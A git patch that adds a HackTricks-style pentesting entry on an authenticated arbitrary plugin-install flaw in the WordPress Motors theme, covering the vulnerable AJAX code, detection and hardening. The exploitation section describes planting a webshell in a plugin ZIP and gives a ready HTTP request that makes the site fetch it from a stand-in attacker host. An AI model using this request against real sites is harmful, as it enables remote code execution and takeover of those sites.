From 1b6392ff53944dbc0f5128cc4b3065fddcad95d7 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 18 Dec 2025 12:43:31 +0000 Subject: [PATCH] Add content from: Critical Arbitrary File Upload Vulnerability in Motors Theme... --- src/SUMMARY.md | 1 + .../inputmethodservice-ime-abuse.md | 1 + .../pentesting-web/wordpress.md | 54 +++++++++++++++++++ 3 files changed, 56 insertions(+) diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 727a26a3a9a..5c74e762cdf 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -372,6 +372,7 @@ - [Objection Tutorial](mobile-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md) - [Google CTF 2018 - Shall We Play a Game?](mobile-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md) - [In Memory Jni Shellcode Execution](mobile-pentesting/android-app-pentesting/in-memory-jni-shellcode-execution.md) + - [Inputmethodservice Ime Abuse](mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md) - [Insecure In App Update Rce](mobile-pentesting/android-app-pentesting/insecure-in-app-update-rce.md) - [Install Burp Certificate](mobile-pentesting/android-app-pentesting/install-burp-certificate.md) - [Intent Injection](mobile-pentesting/android-app-pentesting/intent-injection.md) diff --git a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md index 878d498c40e..8251e907770 100644 --- a/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md +++ b/src/mobile-pentesting/android-app-pentesting/inputmethodservice-ime-abuse.md @@ -81,3 +81,4 @@ adb shell ime help - **User/MDM**: allowlist trusted keyboards; block unknown IMEs in managed profiles/devices. - **App-side (high risk apps)**: prefer phishing-resistant auth (passkeys/biometrics) and avoid relying on “secret text entry” as a security boundary (a malicious IME sits below the app UI). +{{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index cf9b546a2f0..af2d5e1e8d9 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -862,6 +862,59 @@ Hardening - Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code - Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows +### Subscriber+ AJAX plugin installer → forced malicious activation (Motors Theme ≤ 5.6.81) + +[Patchstack's analysis](https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/) showed how the Motors theme ships an authenticated AJAX helper for installing its companion plugin: + +```php +add_action('wp_ajax_mvl_theme_install_base', 'mvl_theme_install_base'); + +function mvl_theme_install_base() { + check_ajax_referer('mvl_theme_install_base', 'nonce'); + + $plugin_url = sanitize_text_field($_GET['plugin']); + $plugin_slug = 'motors-car-dealership-classified-listings'; + + $upgrader = new Plugin_Upgrader(new Motors_Theme_Plugin_Upgrader_Skin(['plugin' => $plugin_slug])); + $upgrader->install($plugin_url); + mvl_theme_activate_plugin($plugin_slug); +} +``` + +- Only `check_ajax_referer()` is called; there is no `current_user_can('install_plugins')` or `current_user_can('activate_plugins')`. +- The nonce is embedded in the Motors admin page, so any Subscriber that can open `/wp-admin/` can copy it from the HTML/JS. +- The handler trusts the attacker-controlled `plugin` parameter (read from `$_GET`) and passes it into `Plugin_Upgrader::install()`, so an arbitrary remote ZIP is downloaded into `wp-content/plugins/`. +- After installation the theme unconditionally calls `mvl_theme_activate_plugin()`, guaranteeing execution of the attacker plugin's PHP code. + +#### Exploitation flow + +1. Register/compromise a low-privileged account (Subscriber is enough) and grab the `mvl_theme_install_base` nonce from the Motors dashboard UI. +2. Build a plugin ZIP whose top-level directory matches the expected slug `motors-car-dealership-classified-listings/` and embed a backdoor or webshell in the `*.php` entry points. +3. Host the ZIP and trigger the installer by pointing the handler to your URL: + +```http +POST /wp-admin/admin-ajax.php HTTP/1.1 +Host: victim.tld +Cookie: wordpress_logged_in_=... +Content-Type: application/x-www-form-urlencoded + +action=mvl_theme_install_base&nonce=&plugin=https%3A%2F%2Fattacker.tld%2Fmotors-car-dealership-classified-listings.zip +``` + +Because the handler reads `$_GET['plugin']`, the same payload can also be sent via the query string. + +#### Detection checklist + +- Search themes/plugins for `Plugin_Upgrader`, `Theme_Upgrader`, or custom `install_plugin.php` helpers wired to `wp_ajax_*` hooks without capability checks. +- Inspect any handler that takes a `plugin`, `package`, `source`, or `url` parameter and feeds it into upgrader APIs, especially when the slug is hard-coded but the ZIP contents are not validated. +- Review admin pages that expose nonces for installer actions—if Subscribers can load the page, assume the nonce leaks. + +#### Hardening + +- Gate installer AJAX callbacks with `current_user_can('install_plugins')` and `current_user_can('activate_plugins')` after nonce verification; Motors 5.6.82 introduced this check to patch the bug. +- Refuse untrusted URLs: limit installers to bundled ZIPs or trusted repositories, or enforce signed download manifests. +- Treat nonces strictly as CSRF tokens; they do not provide authorization and should never replace capability checks. + --- ## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1) @@ -931,5 +984,6 @@ Hardening - [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability) - [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability) - [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability) +- [Critical Arbitrary File Upload Vulnerability in Motors Theme Affecting 20k+ Sites](https://patchstack.com/articles/critical-arbitrary-file-upload-vulnerability-in-motors-theme-affecting-20k-sites/) {{#include ../../banners/hacktricks-training.md}}